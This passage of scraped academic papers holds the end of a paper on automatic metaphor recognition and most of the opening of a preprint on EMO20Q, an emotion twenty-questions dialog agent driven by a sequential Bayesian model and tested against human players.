the target of (Shutova, 2010) is the verb in sentence, while our approach focuses on the noun. To implement algorithm by Shutova, we extract and count each grammar relation in 1 billion sen- tences. These counts are used to calculate con- text matching in (Shutova, 2010), and are also used to calculate selection association. We perform Shutova’s paraphrasing on verbs in 83 sentences, of which only 25 finds a good paraphrases in Shutova’s top 3 results. After removing 17 sentences which contain light verbs (e.g., take, give, put), the algo- 388 Table 6: Metaphor sentences explained by the system Metaphor mapping Sentence Explanation Ideas are food Let that idea simmer on the back burner. stew; carrot; onion We don’t need to spoon-feed our students egg roll; acorn; word with knowledge. Eyes are containers His eyes displayed his compassion. window; symbol; tiny camera His eyes were filled with anger. hollow ball; water balloon; balloon Emotional effect is His mother’s death hit him hard. enemy; monster physical contact That idea bowled me over. punch; stew; onion Life is a container. Her life is crammed with activities. tapestry; beach; dance Get the most out of life. game; journey; prison rithm finds 21 good paraphrases in top 3 results. One reason for the low recall is that Wordnet is in- adequate in providing candidate metaphor mapping. This is also the reason why our metaphor base is better than the metaphor base generated by talking points. 6 Conclusion Knowledge is essential for a machine to identify and understand metaphors In this paper, we show how to make use of two probabilistic knowledge bases au- tomatically acquired from billions of web pages for this purpose. This work currently recognizes and ex- plains metaphoric mappings between nominal con- cepts with the help of selectional preference of just subject-predicate or predicate-object contexts. An immediate next step is to extend this framework to more general contexts and a further improvement will be to identify mappings between any source and target domains. 7 Acknowledgements Kenny Q. Zhu was partially supported by Google Faculty Research Award, and NSFC Grants 61100050, 61033002 and 61373031. References Rodrigo Agerri. 2008. Metaphor in textual entailment. In COLING (Posters), pages 3–6. John Barnden, Sheila Glasbey, Mark Lee, and Alan Wallington. 2002. Reasoning in metaphor under- standing: the att-meta approach and system. In COL- ING ’02, pages 1–5. Eric P. S. Baumer, James P. White, and Bill Tomlinson. 2010. Comparing semantic role labeling with typed dependency parsing in computational metaphor iden- tification. In CALC ’10, pages 14–22. Julia Birke and Anoop Sarkar. 2006. A clustering ap- proach for nearly unsupervised recognition of nonlit- eral language. In In Proceedings of EACL-06, pages 329–336. Jeremy H. Clear. 1993. The digital word. chapter The British national corpus, pages 163–187. Charles J. Fillmore, Christopher R. Johnson, and Miriam R.L. Petruck. 2003. Background to FrameNet. International Journal of Lexicography, 16.3:235–250. James Geary. 2011. I is an Other: The Secret Life of Metaphor and How It Shapes the Way We See the World. Harper. Matt Gedigian, John Bryant, Srini Narayanan, and Bra- nimir Ciric. 2006. Catching metaphors. In In Work- shop On Scalable Natural Language Understanding. Stanford NLP Group. 2013. The Stanford parser. http://nlp.stanford.edu/software/ lex-parser.shtml. Marti A. Hearst. 1992. Automatic acquisition of hy- ponyms from large text corpora. In COLING ’92, pages 539–545. Paul Kingsbury and Martha Palmer. 2002. From tree- bank to propbank. In In Language Resources and Evaluation. Saisuresh Krishnakumaran and Xiaojin Zhu. 2007. Hunting elusive metaphors using lexical resources. 389 In Proceedings of the Workshop on Computational Approaches to Figurative Language, pages 13–20, Rochester, New York, April. ACL. George Lakoff and Mark Johnson. 1980. Metaphors We Live By. University of Chicago Press, Chicago, USA. J. H. Martin. 1990. A Computational Model of Metaphor Interpretation. Academic Press Professional, Inc. Zachary J. Mason. 2004. Cormet: a computational, corpus-based conventional metaphor extraction sys- tem. Comput. Linguist., 30:23–44, March. George A. Miller. 1995. Wordnet: a lexical database for english. Commun. ACM, 38:39–41, November. Srinivas Sankara Narayanan. 1997. Knowledge- based action representations for metaphor and aspect (karma). Technical report. Philip Stuart Resnik. 1993. Selection and information: a class-based approach to lexical relationships. Ph.D. thesis. Ekaterina Shutova, Lin Sun, and Anna Korhonen. 2010. Metaphor identification using verb and noun cluster- ing. In COLING ’10, pages 1002–1010. Ekaterina Shutova. 2010. Automatic metaphor interpre- tation as a paraphrasing task. In HLT ’10, pages 1029– 1037. Catherine Smith, Tim Rumbell, John Barnden, Bob Hendley, Mark Lee, and Alan Wallington. 2007. Don’t worry about metaphor: affect extraction for con- versational agents. In ACL ’07, pages 37–40. P.D. Turney. 2008. The latent relation mapping engine: Algorithm and experiments. Journal of Artificial In- telligence Research, 33(1):615–655. Tony Veale and Yanfen Hao. 2008. A fluid knowledge representation for understanding and generating cre- ative metaphors. In COLING, pages 945–952. Yorick Wilks. 1978. Making preferences more active. Artificial Intelligence, 11(3):197 – 223. Wentao Wu, Hongsong Li, Haixun Wang, and Kenny Qili Zhu. 2012. Probase: a probabilistic taxonomy for text understanding. In SIGMOD Conference, pages 481– 492. Li Zhang. 2010. Metaphor interpretation and context- based affect detection. In COLING (Posters), pages 1480–1488. 390 work_3izv3tjjq5ga7j3fkxkvenujpy ---- A Socratic epistemology for verbal emotional intelligence A peer-reviewed version of this preprint was published in PeerJ on 13 January 2016. View the peer-reviewed version (peerj.com/articles/cs-40), which is the preferred citable publication unless you specifically need to cite this preprint. Kazemzadeh A, Gibson J, Georgiou P, Lee S, Narayanan S. 2016. A Socratic epistemology for verbal emotional intelligence. PeerJ Computer Science 2:e40 https://doi.org/10.7717/peerj-cs.40 https://doi.org/10.7717/peerj-cs.40 https://doi.org/10.7717/peerj-cs.40 A Socratic epistemology for verbal emotional intelligence Abe Kazemzadeh, James Gibson, Panayiotis Georgiou, Sungbok Lee, Shrikanth Narayanan We describe and experimentally validate a question-asking framework for machine-learned linguistic knowledge about human emotions. Using the Socratic method as a theoretical inspiration, we develop an experimental method and computational model for computers to learn subjective information about emotions by playing emotion twenty questions (EMO20Q), a game of twenty questions limited to words denoting emotions. Using human- human EMO20Q data we bootstrap a sequential Bayesian model that drives a generalized pushdown automaton-based dialog agent that further learns from 300 human-computer dialogs collected on Amazon Mechanical Turk. The human-human EMO20Q dialogs show the capability of humans to use a large, rich, subjective vocabulary of emotion words. Training on successive batches of human-computer EMO20Q dialogs shows that the automated agent is able to learn from subsequent human-computer interactions. Our results show that the training procedure enables the agent to learn a large set of emotions words. The fully trained agent successfully completes EMO20Q at 67% of human performance and 30% better than the bootstrapped agent. Even when the agent fails to guess the human opponent's emotion word in the EMO20Q game, the agent's behavior of searching for knowledge makes it appear human-like, which enables the agent maintain user engagement and learn new, out-of-vocabulary words. These results lead us to conclude that the question-asking methodology and its implementation as a sequential Bayes pushdown automaton are a successful model for the cognitive abilities involved in learning, retrieving, and using emotion words by an automated agent in a dialog setting. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts A Socratic Epistemology for Verbal Emotional Intelligence Abe Kazemzadeh, James Gibson, Panayiotis Georgiou, Sungbok Lee, Shrikanth Narayanan Signal Analysis and Interpretation Laboratory University of Southern California, Los Angeles, USA Abstract5 We describe and experimentally validate a question-asking framework for machine-learned linguistic knowl- edge about human emotions. Using the Socratic method as a theoretical inspiration, we develop an experi- mental method and computational model for computers to learn subjective information about emotions by playing emotion twenty questions (EMO20Q), a game of twenty questions limited to words denoting emo- tions. Using human-human EMO20Q data we bootstrap a sequential Bayesian model that drives a generalized10 pushdown automaton-based dialog agent that further learns from 300 human-computer dialogs collected on Amazon Mechanical Turk. The human-human EMO20Q dialogs show the capability of humans to use a large, rich, subjective vocabulary of emotion words. Training on successive batches of human-computer EMO20Q dialogs shows that the automated agent is able to learn from subsequent human-computer interactions. Our results show that the training procedure enables the agent to learn a large set of emotions words. The fully15 trained agent successfully completes EMO20Q at 67% of human performance and 30% better than the boot- strapped agent. Even when the agent fails to guess the human opponent’s emotion word in the EMO20Q game, the agent’s behavior of searching for knowledge makes it appear human-like, which enables the agent maintain user engagement and learn new, out-of-vocabulary words. These results lead us to conclude that the question-asking methodology and its implementation as a sequential Bayes pushdown automaton are a20 successful model for the cognitive abilities involved in learning, retrieving, and using emotion words by an automated agent in a dialog setting. 1. Introduction Epistemology is the branch of philosophy that deals with knowledge and belief. According to basic results in epistemology, knowledge is defined as true, justified belief. This paper was inspired by reflecting on how25 humans justify their beliefs about emotions. This reflection led to a experimental method for collecting human knowledge about emotions and a computational model that uses the collected knowledge in an automated dialog agent. The logician Charles S. Peirce identified three types of thought processes by which a person can justify their beliefs and thereby acquire knowledge: induction, deduction, and hypothesis (Peirce, 1868). Whereas30 Email addresses: abe.kazemzadeh@gmail.com (Abe Kazemzadeh), jjgibson@usc.edu (James Gibson), georgiou@sipi.usc.edu (Panayiotis Georgiou), sungbokl@usc.edu (Sungbok Lee), shri@sipi.usc.edu (Shrikanth Narayanan) 1 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts induction is primarily involved with observational data, deduction and hypothesis have a linguistic, propo- sitional component. The third of these, hypothesis (also known as abduction (Eco and Sebeok, 1988)), has been compared with the Socratic method of questioning-asking dialogs (Hintikka, 2007). The Socratic method was named after the ancient Greek philosopher Socrates who applied his method of inquiry to examine concepts that seem to lack any concrete definition, in particular some of the complex moral and35 psychological concepts of his time like “justice”, “knowledge”, “piety”, “temperance”, and “love”. We claim that this method of inquiry can shed light on how people justify beliefs about emotional concepts, which also seem to defy concrete definition. Question-asking allows people to learn about things without directly experiencing them. Since a computer agent cannot directly experience emotions as a human would, question-asking can be leveraged for the40 computer agent to learn about emotional concepts. Question-asking has also been proposed as a stage in child development resposible for rapid learning and language acquisition (Frazier et al., 2009). Likewise, a computer agent can use question-asking to acquire knowledge and vocabulary. We call the approach of using question-asking to interactivly acquire linguistic knowledge about emotion by a computer dialog agent a Socratic epistemology for verbal emotional intelligence.45 The knowledge acquired by the Socratic epistomology for verbal emotional intelligence is an informal, social type of knowledge. This informal knowledge about emotions is important because although there has been much recent progress toward understanding the underlying biological basis for emotion, humans have been able to understand emotions informally since ancient times. We call this informal, language-based understanding of emotions natural language description of emotion (Kazemzadeh, 2013). Natural language50 descriptions of emotion are utterances that refer to emotions, as opposed to utterances that express emotions. This phenomenon can be seen as a specific subset of the larger phenomenon of emotional language, which also includes emotion or sentiment expressed towards some object, vocal modulation due to emotion, and persuasion and pragmatics. Studying language that deals with referential statements about emotions is a novel focus that is distinct from the prevailing trends of studying the expressive characteristics of emotional55 language. The framework we present also differs from other computational theories of emotion in that it aims to study how people describe emotions, rather than how emotions should be described. As such, it can be seen as a descriptive, rather than prescriptive, theory, and hence has commonalities with sociological studies of emotions (King, 1989; Shaver et al., 2001; Mihalcea and Liu, 2006; Kamvar and Harris, 2009; Kazemzadeh60 et al., 2012) and crowd-sourcing. Although there is clearly a biological basis for emotions, the way that people describe emotions in natural language varies over time from culture to culture and person to person. A descriptive theory of how people describe emotions in natural language should reflect this variation. Thus, a particular instantiation of a theory of natural language description of emotion should be relative to a 2 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts particular agent or set of agents at a given time who hold similar beliefs and communicate using the same65 language. Rather than trying to establish a single, particular definition for emotion words, we study how shared meaning can be established through natural language dialog behavior even when people and agents may have different ways of experiencing and their describing emotions. The key goals of this paper are to use question-asking to observe natural language descriptions of emotion in the context of interactive dialogs and to computationally model the communicative behavior that supports70 the referential link between language and emotions. To do this, we use an experimental game called emotion twenty questions (EMO20Q). EMO20Q is played like the traditional game of twenty questions, except that one player, the answerer, must choose a word that names an emotion. The other player, the questioner, must try to guess the emotion that the answerer picked by posing a series of twenty or fewer questions. Importantly, we do not restrict the set of emotion words that the players can choose nor the questions75 they can ask: the set of emotion words and questions is not limited except by the players’ judgment and cooperation. An example of a human-computer EMO20Q game is given below: Agent: Let me know when you have picked an emotion word. User: ok Agent: Is it very intense?80 User: no Agent: is it positive? User: yes Agent: is it an emotion that just pops up spontaneously (vs being triggered by something)? User: depends85 Agent: is it caused by anything in particular User: well, yes, you need the right conditions Agent: Is it relaxation? User: Yes Agent: So did I get it right?90 User: Yes, you got it. Agent: Awesome! Would you like to play again? User: No, thanks. Agent: Thank you for playing The data from the human-human EMO20Q games allows us to observe what words people consider to denote95 emotions, what questions people ask about emotions, what factors determine the length of question/answer exchanges, and what is the probability that the emotion words will be correctly guessed. These results are used to create the computer agent and test its performance with respect to human performance. For the 3 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts automated agent presented in this paper, we focused on the case where the computer agent plays the role of the questioner while future work for an answerer agent is discussed in Section 6.100 The paper is organized as follows. Section 2 discusses the motivations and theory behind our work. Section 3 describes the computational model and algorithm we used to create an EMO20Q questioner agent. Section 4 discusses experiments we conducted of humans and computers playing EMO20Q. Section 5 describes the results of testing the agent. Finally Section 6 and Section 7 propose future work and provide discussion and links to open source software implementations.105 2. Background 2.1. Natural Language Descriptions of Emotions Just as memory addresses, variables, and URLs refer to electronic resources for computers, so do words and descriptions identify objects, both physical and conceptual, for humans. When processing natural language by computer, it can help to draw upon these similarities. This is especially helpful in the case of110 affective computing, when the objects we wish to refer to, emotions, are abstract and subjective. In this paper we make a distinction between the emotion expressed by the speaker and the emotion referred to by the speaker. Currently there has been a great degree of interest in automatically analyzing emotional expression in language. The goal of such analysis is to determine emotions expressed by the speaker or writer, i.e., the emotions that the speaker currently feels. The language used as input to this kind of analysis can115 be a speech recording or textual representation of language. However, automatically analyzing the emotions expressed in an utterance or document is problematic when a speaker refers to emotions that are not his or her own current emotions. Some examples of this include quotations, storytelling/gossip, counterfactual reasoning, post facto emotional self-report, and abstract references to emotions. He said that he was mad. (quotation)120 Did you see how mad John was? (gossip) If you eat my ice cream, I will get mad. (counterfactual) I was mad when my car got stolen last year. (self-report) Anger is one of the seven sins. (abstract reference). In these examples, a naïve automated analysis would detect anger, but in fact the writer of these sentences is125 not actually feeling anger at the current time. In many cases, such as task-driven dialogs like ordering airline tickets from an automated call center, this distinction might not be pertinent. However, for open-ended dialog systems the distinction between expression and reference of emotions could be relevant, for example an automated agent for post-traumatic stress disorder therapy. The study of natural language descriptions of emotions brings the distinction between emotion expression and reference into focus.130 4 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts The ability to talk about things beyond the here-and-now has been termed displacement (Hockett and Altmann, 1968). Displacement is an important characteristic that distinguishes human language from animal communication. In the context of this research, the ability talk about an emotion without it being physically present is a key component of natural language description of emotion. Natural language description of emotion has been examined in ethnography, comparative linguistics, and cognitive science and it is beginning135 to be studied in the domain of natural langauge processing (King, 1989; Zoltán Kövecses, 2000; Rolls, 2005; Kazemzadeh et al., 2012). At the most basic level, natural language description of emotion includes words that name emotions, e.g. angry, happiness, etc. However, due to the productive, generative nature of natural language, it is possible to refine and generalize emotion descriptions with longer natural language phrases. In order to140 communicate using natural language descriptions of emotions, people must be able to come to a shared understanding about the meaning of these descriptions. Russell (1905) introduced the notion of definite descriptions, a logical device to used to model unique reference in the semantics of languages, both formal and natural. In this paper, we focus on the natural language definite descriptions. Common examples of natural language definite descriptions are proper names and noun phrases with the definite article “the”.145 Indefinite descriptions, on the contrary, are prefaced with indefinite articles, such as “a”, “some”, or “every”. We maintain that natural language descriptions of emotions are definite descriptions when they are used in natural language interaction that terminates in mutual agreement. By considering terms that refer to emotions as definite descriptions, we are trying to capture the intuition that different people mean the same things when they use the same emotion terms. In Barrett (2006), the question is posed of whether emotions150 are natural kind terms, to which the paper answered no, i.e., that emotion words in general represent non-unique classes of human behavior rather than fundamentally distinct biological classes. The question of whether emotion terms are definite descriptions can be seen as a less stringent criterion than that of whether they are natural kinds. In this paper, we apply the notion of definite descriptions to capture the experimental data which indicates that there is a high degree of consensus about how emotions are described155 when measured by successful outcomes in human-human EMO20Q. 2.2. EMO20Q, Crowd-Sourcing, and Experimental Design The game of EMO20Q was designed as a way to elicit natural language descriptions of emotion. Posing the experiment as a game leverages past results in crowd-sourcing and games with a purpose. From the perspective of natural language processing, the EMO20Q game can be seen as a Wizard of Oz experiment160 that collects human behavior to train the behavior of an automated agent. Games like EMO20Q can be seen as games with a purpose (von Ahn and Dabbish, 2004) whose purpose is crowd-sourcing (Howe, 2006) the collective knowledge and beliefs of the players (Kazemzadeh et al., 2011). The phenomenon of crowd-sourcing is closely tied to the emergent properties of online social communities (Zhong et al., 2000). 5 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts By relying on the wisdom of the masses, we venture a simple answer to the difficult question, “what is165 emotion?”. The answer, according to crowd-sourcing, is that emotion is what people say it is. Although this answer side-steps many important issues, such as physiological and psychological descriptions of emotions, it does bring other issues into sharper focus. There has been a trend toward studying non-prototypical emotional data (Mower et al., 2009). Non-prototypical emotional data is exemplified by disagreement among annotators when assigning emotional labels to data. We argue that our methodology provides a crowd-170 sourced description of emotions that can effectively deal with non-prototypical emotions. To avoid falling into the ad populem logical fallacy, we formulate the answer to the question “what is emotion?” not as a question of truth, but a question of knowledge and belief, i.e., an issue of epistemology as described in Section 1, in effect skirting the question of ground truth, but asking other interesting questions: “what do people believe about emotions, how do they express these beliefs in language, and how do they justify their175 beliefs through question-asking behavior?” Annotation tasks can be seen as a type of crowd-sourcing to find consensus about assigning emotionl labels to data. Elicitation of subjects also has aspects of crowd-sourcing to experimentally observe a diversity of emotional behavior in response to experimentally controlled stimuli. It can be argued that compared with annotation and elicitation of emotional data EMO20Q provides higher experimental validity and sensitivity180 and less experimental bias at the expense of experimental control and reliability. In terms of experimental design, the human-human EMO20Q is a quasi-experiment or natural experiment, as opposed to a controlled experiment, which means that there is not a manipulation of variables made by the experimenters, but rather that these variables are observed as they vary naturally within the system. With annotation and elicitation tasks, experimenters can control the vocabulary of annotation labels and with185 elicitation tasks experimenters can control the stimuli that are presented. With this control, experiments are more easily repeated. In EMO20Q, we did not control what emotion words or questions the subjects picked so for another population the results could vary, leading to less experimental reliability. However, trading off control and reliability leads to more experimental sensitivity and validity and less experimental bias. In EMO20Q subjects can choose any words or questions they want and they communicate in a natural190 dialog setting. This way of characterizing emotion is closer to natural communication and more sensitive to nuances of meaning. When forced to annotate using a fixed vocabulary of emotion words, subjects are experimentally biased toward using that vocabulary. The automated dialog agent is one way to enforce more experimental control for EMO20Q. Because the agent’s behavior is programmed we can use this as a way to better control and replicate experiments.195 Another way we aimed to improve experimental reliability is by prompting users to pick emotion words from three different difficulty classes. Sections 3 and 4 further describe the computational model for the agent’s behavior and our experimental design. 6 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts 3. Model Bayesian models have been successfully applied to a wide range of human cognitive abilities (Griffiths200 et al., 2008), including inductive inference of word meaning from corpora (Steyvers et al., 2006) and experi- mental stimuli (Xu and Tenenbaum, 2005) and powering affective dialog agents (Carofiglio et al., 2009). To our knowledge, this work is the first application of Bayesian cognitive models for learning emotion words from dialog interaction. The model we use for the EMO20Q questioner agent is a sequential Bayesian belief update algorithm.205 This model fits the framework of Socratic epistemology, as described in the introduction, because it combines the notion of belief and question-asking. Intuitively, this algorithm instantiates an agent whose semantic knowledge is based on data from previous EMO20Q matches. The agent begins a new match of EMO20Q with a uniform belief about the emotion word to be guessed. Based on the previous semantic knowledge, the agent asks questions and updates its belief based on each observation of the user’s answers to the questions.210 While the EMO20Q match is played, the observations are stored in the agent’s episodic buffer (Baddeley, 2000), also known as working memory. After the match, the agent updates its semantic knowledge using the results of the match, clears its episodic buffer, and is then ready to play again. The words in italics are high-level abstractions used to create a cognitive model for the agent, which is underlyingly implemented as a sequential Bayesian statistical model. We ask that the reader keep this abstraction in his or her episodic215 buffer when reading the following description of the model’s technical implementation. The semantic knowledge described above is the conditional probability of observing a set of question- answer pairs given a hidden variable ranging over emotion words. This conditional probability distribution is estimated from the corpus of past human-human and human-computer EMO20Q matches as follows. Let E be the set of emotion words and let ε ∈ E be this categorical, Bayesian (i.e., unobserved) random variable220 distributed over the set E. The probability of ε, P(ε) is the belief about the emotion word to be guessed. Each question-answer pair from the match of EMO20Q is considered as an observation or feature of the emotion being predicted. Thus if Q is the set of questions and A is the set of answers, then a question q ∈ Q and an answer a ∈ A together compose the feature f = (q, a), i.e. f ∈ Q × A. The conditional probability distribution, P(f|ε), which represents semantic knowledge, is estimated from the training data225 using a smoothing factor of 0.5 to deal with sparsity. In this model we stipulate that the set of answers A are four discrete cases: “yes”, “no”, “other”, and “none”. When the answer either contains “yes” or “no”, it is labeled accordingly. Otherwise it is labeled “other”. The feature value “none” is assigned to all the questions that were not asked in a given dialog. “None” can be seen as a missing feature when the absence of a feature may be important. For example, the fact that a230 certain question was not asked about a particular emotion may be due to the fact that that question was not relevant at a given point in a dialog. 7 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Similarly, we stipulate that the questions can be classified into some discrete class that is specified through a semantic expression derived from the annotation of questions, as described in Section 4.1. For example, the question “is it a positive emotion?” is represented as the semantic expression “e.valence==positive”. If the an-235 swer to this question was “maybe”, the resulting feature would be represented as (‘e.valence==positive’,‘other’). Using Bayes rule and the independence assumption of the naïve Bayes model, we can formulate the agent’s belief about the emotion vector ε after observing features f1...ft, in one single batch, as opposed to sequentially (which will be formulated next): P(ε|f1, ..., ft) = Qt i=1 [P(fi|ε)] P(ε) Qt i=1 P(fi) . (1) This is simply the formulation of naïve Bayes, where in this case P(ε) is the prior probability of a player240 choosing a specific emotion word, Qt i=1 [P(fi|ε)] is the likelihood of seeing question-answer pairs given specific emotion words, and Qt i=1 P(fi) is the probability of observing question-answer pairs in general. In terms of the high-level cognitive model, the set of observational feature vector f1...ft is what was described as the agent’s episodic buffer. P(f|ε) is the agent’s semantic knowledge that relates question- answer features to emotion words. p(ε) and P(ε|f1, ..., ft) are the agent’s initial/prior and final/posterieor245 beliefs, respectively. In Equation 1, the posterior belief of the agent of emotion ek at time t, P(ε = ek|f1, ..., ft) is computed only after the agent has asked all t questions. This model is known as naïve Bayes. In contrast the sequential Bayes model that we use is dynamic: the agent updates its belief at each time point based on the posterior probability of the previous step, i.e., at time t250 P(ε|f1, ..., ft) = P(ft|ε)P(ε|f1, ..., ft−1) P(f1, ..., ft) When the game begins, the agent can start with a uniform prior on its belief of which emotion is likely or it can use information obtained in previously played games. In the experiments of this paper, we use a uniform prior, P(ε = ek) = 1/|E|, ∀k = 1...|E|. We chose to use the uniform prior to initialize the agent because our training data contains many single count training instances and because we want to examine how the system performs with less constraints.255 We introduce a new variable βt,k = P(ε = ek|f1, ..., ft) for the agent’s belief about emotion k at time t and postulate that the agent’s prior belief at a given time is the posterior belief of the previous step. Then, the agent’s belief unfolds according to the formula: β0,k = P(ε = ek) = 1/|E| β1,k = P(f1|ε = ek) P(f1) β0,k βt,k = P(ft|ε = ek) P(f1, ..., ft) βt−1,k (2) 8 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Decomposing the computation of the posterior belief allows the agent to choose the best question to ask the user at each turn, rather than having a fixed battery of questions. We define “the best question” at260 time t to be the question that is most likely to have a “yes” answer given the posterior belief at time t − 1, P(ε|f1, ..., ft−1): argmaxq∈Q P((q, ‘yes’))|ε)P(ε|f1, ..., fi−1) This next-question criterion is a heuristic motivated by considering “yes” answers to be positive feedback that the agent is on the right track. While this heuristic worked well in practice, other next-question criteria are certainly possible and this is an area for future research.265 At time t the agent asks the best question and takes the user’s response as input. It then parses the input to classify it into one of {“yes”, “no”, “other”}. This information is then used to update the agent’s posterior belief βt+1,k about each emotion ek ∈ E, which will then be used as the prior in the following step. The unfolding of variable β in Equation 2 models the update of belief as it is justified by the agent’s question-asking and the user’s answers. It is this computational model of question-asking and belief update270 that represents the Socratic epistemology for verbal emotional intelligence in a software agent. Table 1 shows an example interaction between the automated EMO20Q questioner agent and a human user, along with a trace of the agent’s belief state that shows the justification of beliefs by question-asking. Identity questions are a special type of question where the agent makes a guess about the emotion. Identity questions are chosen with the same best question criteria as other questions but trigger a transition275 to a different dialog state. An affirmative answer to an identity question (e.g., “is it happy?”) means that the agent successfully identified the user’s chosen emotion. Any other answer to an identity question will set the posterior probability of that emotion to zero because the agent can be sure it is not the emotion of interest. The pseudo-code for the main loop of the adaptive Bayesian agent is shown in Algorithm 1. This auto-280 mated, data-driven component was framed within a manually designed dialog graph, as shown in Figure 1. The dialog graph is implemented as a generalized pushdown transducer. Recall that a pushdown transducer is an transducer that can determines it output symbol and next state based on its current state, the input symbol, and the top of its stack (Allauzen and Riley, 2012). A generalized pushdown transducer is a push- down transducer that is not limited to only the top of the stack when determining the output and next state.285 This aspect is important in the question asking loop because the stack represents the episodic memory, which stores the question-answer observations. Otherwise, the agent could be implemented as a plain pushdown transducer. 9 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Algorithm 1 Sequential Bayesian EMO20Q agent. F is the observed question-answer features, E is the set of previously seen emotion words, P(f|ε) is the semantic knowledge relating the observed question-answer pairs to emotion words, and βt,k is the belief about the emotion word indexed by k at time t. Because the agent is playing a twenty questions game, d is set to 20, but this could be changed for the agent to generalize to different question-asking tasks. Input: F = Q × A, E, and P(f|ε) β0,k ← 1/|E|, ∀k = 1...|E| for i = 1 to d do q(i) = argmax q∈Q P((q, ‘yes’)|ε)P(ε|f1, ..., fi−1) Print q(i) a(i) ← user’s input answer fi ← (q (i), a(i)) βi,k ← βi−1,k · P(fi|ε = ek)/P(f1, ..., fi), ∀k = 1...|E| if (q(i) is identity question for ek ∧ a (i) = ‘yes’ ) then Return: e∗ = ek end if if (q(i) is identity question for ek ∧ a (i) = ‘no’) then βi,k ← 0 end if end for k∗ ← argmax k∈1...|E| [βi,k] e∗ ← ek∗ Return: most likely emotion given observations: e∗ 10 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Figure 1: Dialog graph for the EMO20Q questioner agent. The loop labelled “asking” represents the functionality described by the sequential Bayesian belief model of Equation 2 and Algorithm 1. The dialog graph is implemented as a generalized pushdown automaton, where the stack represents the agent’s working memory of question-answer turns. 4. Experiments The EMO20Q experiments we conducted can be partitioned into human-human and human-computer290 experiments. Section 4.1 will examine the data from human-human experiments, which was the initial corpus used to train the EMO20Q question-asking agent. Section 4.2 will focus on experiments with the question-asking agent described in Section 3. 4.1. Human-Human EMO20Q The human-human EMO20Q results are described in an earlier conference paper (Kazemzadeh et al.,295 2011) but we include a brief description because it is important for understanding the development of the automated agent. We collected a total of 110 matches from 25 players in the human-human experiments in which EMO20Q was played over text chat. The EMO20Q experiment was implemented as an online chat application using the Extensible Messaging and Presence Protocol (XMPP) and logged so that the games can be easily recorded300 and studied. Early in our pilot studies, we realized that it was difficult to successfully terminate the game when the questioner guessed words that were synonyms of the that word the answerer picked. This led us to treat the phenomenon of synonyms with an additional rule that allowed the game to terminate if the answerer 11 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts could not verbally explain any difference between the two words. In this case, we considered the game to305 terminate successfully, but we flagged these matches and kept track of both words. Of the 110 matches played between the 25 human players, 94 – approximately 85% – terminated suc- cessfully with the questioner correctly identifying the emotion that the answerer picked or a word that the answerer felt was a synonym. The mean and median number of questions asked per game was 12.0 and 10, respectively, when failures to correctly guess the emotion were averaged in as 20 questions.310 Of the 94 successfully terminated matches, 22 terminated with synonyms. The 16 unsuccessfully termi- nated matches that were considered failures consisted of several distinct cases. The questioner player could give up early if they had no clue (5/16), they could give up at twenty questions (1/16), or they could pass twenty questions due to losing count or as a matter of pride (6/16). The four remaining cases were considered failures because the answerer inadvertently gave away the answer due to a typing error or giving an unduly315 generous hint. There were 71 unique words that players chose in the human-human games, 61 of which were correctly identified. These are listed in Table 2. There was a total of 1228 question-asking events. Of the questions, 1102 were unique (1054 after normal- izing the questions for punctuation and case). In Table 3 we list some of the questions that occurred more320 than once. Since the surface forms of the questions vary widely, we used manual preprocessing to standardize the questions to a logical form that is invariant to wording. This logical form converted the surface forms to a pseudo-code language by converting the emotion names to nouns if possible, standardizing attributes of emotions and the relations of emotions to situations and events. Examples of the standardized questions are shown in Table 4. After this semantic standardization, there were a total of 727 question types.325 4.2. Human-Computer EMO20Q Using the human-human data described earlier in Section 4.1 and the computational model and algorithm described in Section 3, we built a computer agent to play the questioner role in EMO20Q games. The EMO20Q dialog agent was implemented using a server-side web application that maintained the belief state and episodic buffer for each open connection. The belief state was serialized to EmotionML (Schröder et al.,330 2012; Burkhardt et al., 2014) and saved in a session database between each question-answer turn. To test the proposed model of Socratic epistemology for verbal emotional intelligence, we conducted two experiments to assess the performance of the agent. The first experiment was a small pilot study of 15 subjects who played three matches against the agent (Kazemzadeh et al., 2012). In the pilot study, the subjects were recruited locally. Subjects were asked to pick three emotion words, one that they thought335 was “easy”, one that was “medium”, and a third that was “difficult”. These difficulty ratings were described in terms of a person’s maturity and vocabulary: an “easy” emotion word was one that a child could guess, whereas a “difficult” word was one that would require maturity and a sophisticated vocabulary to guess. The 12 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts pilot study was designed to assess 